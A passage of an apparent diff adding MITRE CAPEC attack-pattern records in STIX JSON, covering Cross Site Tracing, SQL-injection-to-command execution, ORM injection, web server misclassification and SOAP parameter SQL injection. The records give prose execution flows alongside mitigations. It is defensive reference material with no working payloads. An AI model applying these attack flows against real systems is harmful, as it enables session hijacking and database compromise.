Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-106", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/106.html" + } + ], + "id": "attack-pattern--87829d14-eece-4fa3-b36f-54cc3b2262ae", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: XSS through Log Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server.", + "external_references": [ + { + "external_id": "CAPEC-107", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/107.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-648", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/648.html" + }, + { + "description": "Cross Site Tracing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Site_Tracing" + }, + { + "description": "Jeremiah Grossman, Cross-Site Tracing (XST), 2003, WhiteHat Security", + "external_id": "REF-3", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf" + } + ], + "id": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cross Site Tracing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + "x_capec_child_of_refs": [ + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with their malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system.\n In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that they control and get it to execute in the victim's browser (if they can trick the victim's into visiting their malicious website or clicking on the link that they supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. 
An adversary will then need to find a way to exploit another weakness that would enable them to circumvent the same origin policy protection.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if HTTP Trace is enabled: Determine if HTTP Trace is enabled at the web server with which the victim has an active session

  2. Techniques
    An adversary may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response.

Experiment

  1. Identify mechanism to launch HTTP Trace request: The adversary attempts to force the victim to issue an HTTP Trace request to the targeted application.

  2. Techniques
    The adversary probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request.

Exploit

  1. Create a malicious script that pings the web server with HTTP TRACE request: The adversary creates a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the adversary.

  2. Techniques
    The adversary's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response.
  3. Execute malicious HTTP Trace launching script: The adversary leverages an XSS vulnerability to force the victim to execute the malicious HTTP Trace launching script

  4. Intercept HTTP TRACE response: The adversary's script intercepts the HTTP TRACE response from teh web server, glance sensitive information from it, and forward that information to a server controlled by the adversary.

", + "x_capec_extended_description": "\n The adversary uses an XSS attack to have victim's browser sent an HTTP TRACE request to a destination web server, which will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. Since the HTTP header of the original HTTP TRACE request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get their malicious script to issue an HTTP TRACE request to the destination system's web server.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "HTTP TRACE is enabled on the web server", + "The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy", + "Scripting is enabled in the client's browser", + "HTTP is used as the communication protocol between the server and the client" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Understanding of the HTTP protocol and an ability to craft a malicious script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Administrators should disable support for HTTP TRACE at the destination's web server. 
Vendors should disable TRACE by default.", + "id": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92929267-6931-47a1-b4dd-3fd1d012b7cf", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16cc4cf6-75a8-41a1-bbc7-eff92929bc02", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Patch web browser against known security origin policy bypass exploits.", + "id": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-107-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb4b5528-6e2e-4670-bfd3-983606f61020", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--db00ffba-8edb-4b26-be69-98de08e8b45c", + "target_ref": "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.", + "external_references": [ + { + "external_id": "CAPEC-108", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/108.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-114", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/114.html" + } + ], + "id": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Command Line Execution through SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ 
+ "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799).\n Reference: https://www.cve.org/CVERecord?id=CVE-2006-6799\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query.

Exploit

  1. Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive: The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive.

  2. Inject malicious data in the database: Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument

  3. Trigger command line execution with injected arguments: The attacker causes execution of command line functionality which leverages previously injected database content as arguments.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application does not properly validate data before storing in the database", + "Backend application implicitly trusts the data stored in the database", + "Malicious data is used on the backend as a command line argument" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disable MSSQL xp_cmdshell directive on the database", + "id": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb697224-7fb5-464b-bb81-e9cc28732c2d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d1918081-1fdb-428c-b1e3-8116e054620e", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly validate the data (syntactically and semantically) before writing it to the database.", + "id": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--06fffa19-8a09-4715-bf01-f67ec647d4fc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--dad09427-e3ef-43e9-8424-cfb6594bedb2", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. 
as a command line argument).", + "id": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-108-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74092c9d-86c1-49c6-82cc-08e4da29ea92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--901ac737-5a15-4ef1-be33-b2e36a8c50da", + "target_ref": "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject their own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). 
While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.", + "external_references": [ + { + "external_id": "CAPEC-109", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/109.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-564", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/564.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-4", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.7-Testing_for_ORM_Injection" + } + ], + "id": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Object Relational Mapping Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary 
Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Persistence Framework Used: An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer.

  2. Techniques
    An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there.
  3. Probe for ORM Injection vulnerabilities: The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content.

Exploit

  1. Perform SQL Injection through the generated data access layer: An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries.

  2. Techniques
    An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An application uses data access layer generated by an ORM tool or framework", + "An application uses user supplied data in queries executed against the database", + "The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework", + "id": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44a7c013-8531-4a05-b8fc-d49a59a09123", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fc27d692-9337-4434-bf26-3b58ffd7ab42", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure to keep up to date with security relevant updates to the persistence framework used within your application.", + "id": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-109-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d021b9f3-7bd8-4d7c-8e30-933d2cff35f6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d19890d1-f3ad-4940-851c-62729cd33bf5", + "target_ref": "attack-pattern--f0e32d0e-9580-4b79-95e0-6e3b99bf6e45", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. 
This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process.", + "external_references": [ + { + "external_id": "CAPEC-11", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/11.html" + }, + { + "external_id": "CWE-430", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/430.html" + }, + { + "description": "Masquerading: Space after Filename", + "external_id": "T1036.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/006" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204), SecurityFocus", + "external_id": "REF-6", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/bid/17204/info" + } + ], + "id": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cause Web Server Misclassification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--95afb65f-ece7-4511-85a3-d7bfb9973022" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) 
or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser.\n http://victim.site/login.jsp.\n Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue.\n [REF-6]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Footprint file input vectors: Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server.

  2. Techniques
    Attacker manually crawls application to identify file inputs
    Attacker uses an automated tool to crawl application identify file inputs
    Attacker manually assesses strength of access control protecting native application files from user control
    Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests

Experiment

  1. File misclassification shotgunning: An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior.

  2. Techniques
    Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server.
    Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server.
  3. File misclassification sniping: Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type.

  4. Techniques
    Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server.
    Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server.

Exploit

  1. Disclose information: The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed).

  2. Techniques
    Manipulate the file names that are explicitly sent to the server.
    Manipulate the MIME sent in order to confuse the web server.
", + "x_capec_extended_description": "\n This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Web server software must rely on file name or file extension for processing.", + "The attacker must be able to make HTTP requests to the web server." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_skills_required": { + "Low": "To modify file name or file extension", + "Medium": "To use misclassification to force the Web server to disclose configuration information, source, or binary data" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Server routines should be determined by content not determined by filename or file extension.", + "id": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-11-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22b26b12-1eff-40ab-95ab-8de26f22b487", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2f0dd07-332e-41f6-951c-fa0994e302de", + "target_ref": "attack-pattern--74a4fb36-83cb-4851-b09c-370f1a408523", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. 
This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.", + "external_references": [ + { + "external_id": "CAPEC-110", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/110.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + } + ], + "id": "attack-pattern--7c90bef7-530c-427b-8fb7-f9d3eda9c26a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "SQL Injection through SOAP Parameter Tampering", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--8e3a14fd-870a-4286-866d-805107c7d922" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--89acf77d-723b-43b4-b66d-6eaafed52369" + ], + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. 
They notice that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies their payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Detect Incorrect SOAP Parameter Handling: The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application.

  2. Techniques
    The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior.

Experiment

  1. Probe for SQL Injection vulnerability: The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query.

Exploit

